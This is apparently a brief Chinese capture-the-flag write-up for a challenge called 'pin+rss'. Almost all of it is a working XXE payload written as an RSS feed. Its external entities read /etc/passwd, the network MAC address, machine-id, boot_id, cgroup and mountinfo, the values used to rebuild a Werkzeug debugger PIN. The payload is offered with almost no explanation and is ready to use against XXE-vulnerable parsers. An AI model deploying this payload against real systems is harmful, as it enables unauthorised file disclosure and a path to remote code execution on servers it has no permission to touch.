pin+rss

就是xml注入加pin,被docker版本坑了一回

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
  <!ELEMENT name ANY >
  <!ENTITY xxe_1 SYSTEM "file:///etc/passwd" >
  <!ENTITY xxe_2 SYSTEM "file:///sys/class/net/eth0/address" >
  <!ENTITY xxe_3 SYSTEM "file:///etc/machine-id" >
  <!ENTITY xxe_4 SYSTEM "file:///proc/sys/kernel/random/boot_id" >
  <!ENTITY xxe_5 SYSTEM "file:///proc/self/cgroup" >
  <!ENTITY xxe_6 SYSTEM "file:///proc/self/cgroup2" >
  <!ENTITY xxe_7 SYSTEM "file:///proc/self/mountinfo" >
]>
<rss version="2.0">
  <channel>
    <title>XXE</title>
    <link>http://www.example.com</link>
    <description>This is a sample RSS feed</description>
    <item>
      <title>[/etc/passwd]  &xxe_1;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/sys/class/net/eth0/address]  &xxe_2;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/etc/machine-id]  &xxe_3;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/sys/kernel/random/boot_id]  &xxe_4;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/self/cgroup]  &xxe_5;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/self/cgroup2]  &xxe_6;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/self/mountinfo]  &xxe_7;</title>
      <link>ext</link>
    </item>
  </channel>
</rss>